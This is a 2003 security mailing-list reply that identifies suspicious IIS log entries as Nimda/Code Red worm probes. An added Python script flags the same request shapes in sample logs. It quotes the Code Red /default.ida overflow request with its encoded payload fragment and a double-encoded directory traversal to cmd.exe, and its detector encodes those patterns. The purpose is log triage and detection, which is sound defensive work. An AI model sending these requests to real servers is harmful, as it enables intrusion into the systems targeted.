Security Basics mailing list archives
RE: Suspicious IIS etc...
From: "J. Oquendo" <segment () antioffline com>
Date: Tue, 9 Sep 2003 17:02:01 -0400
Looks like Nimda/Code Red if you ask me.

--------------------------------------------------------------------------
/default.ida
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u90
90%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u
9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 404 -
[ex030908.log (201)] : 2003-09-08 06:31:02 xx.xxxxx.xxx - xxx.xx.xxx.xx 80
GET /<Rejected-By-UrlScan> ~/scripts/..%255c%255c../winnt/system32/cmd.exe
--------------------------------------------------------------------------

--
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
exec `echo ajbqghuf|rot13|sed '/\n/!G;s/\(.\)\(.*\n\)/&\2\1/;//D;s/.//'`

Jesus Oquendo
sil @ disgraced . org
sil @ antioffline . com

PGP Fingerprint
39A7 24C6 A9A0 6C67 96CA 0302 F1D3 2420 851E E3D0

http://www.antioffline.com
http://www.politrix.org

You're free. And freedom is beautiful. And, you know, it'll take time to restore chaos and order, order out of chaos. But we will."

George W. Bush
Washington, D.C., April 13, 2003
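
Added example, not part of the original post: a small triage script that flags the two request shapes quoted in the message above (an oversized /default.ida request carrying %uXXXX escapes, and a double-encoded ..%255c traversal to cmd.exe). The sample log lines, addresses, label names and thresholds are constructed assumptions; it matches on the raw line rather than parsing IIS #Fields.

```python
import re
from urllib.parse import unquote

# Constructed log lines modelled on the two requests quoted in the message;
# addresses are documentation ranges, the filler length is an assumption.
SAMPLE_LOG = [
    "2003-09-08 06:30:11 192.0.2.10 - 198.51.100.5 80 GET /default.ida "
    + "X" * 224 + "%u9090%u6858%ucbd3%u7801%u9090%u6858=a 404 -",
    "2003-09-08 06:31:02 192.0.2.11 - 198.51.100.5 80 GET "
    "/<Rejected-By-UrlScan> ~/scripts/..%255c%255c../winnt/system32/cmd.exe 404 -",
    "2003-09-08 06:32:40 192.0.2.12 - 198.51.100.5 80 GET /default.ida - 404 -",
    "2003-09-08 06:33:05 192.0.2.13 - 198.51.100.5 80 GET /index.html - 200 -",
]

FILLER = re.compile(r"([A-Za-z])\1{63,}")    # 64+ repeats of one letter
U_ESCAPE = re.compile(r"%u[0-9a-fA-F]{4}")   # IIS-style %uXXXX escapes


def fully_decode(text, max_rounds=3):
    """Percent-decode repeatedly so %255c -> %5c -> backslash is caught."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def classify(line):
    """Return a label for a suspicious request line, or None."""
    lowered = line.lower()
    if ".ida" in lowered and FILLER.search(line) and len(U_ESCAPE.findall(line)) >= 4:
        return "ida-overflow-probe"
    path = fully_decode(lowered).replace("\\", "/")
    if "../" in path and "cmd.exe" in path:
        return "cmd-traversal-probe"
    return None


def triage(lines):
    """Map each label to the log lines that matched it."""
    hits = {}
    for line in lines:
        label = classify(line)
        if label:
            hits.setdefault(label, []).append(line)
    return hits


if __name__ == "__main__":
    for label, matched in triage(SAMPLE_LOG).items():
        print(label, len(matched))
```

A plain request for /default.ida with no filler or escapes is deliberately left unlabelled, so the script separates the probe pattern from ordinary 404s.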
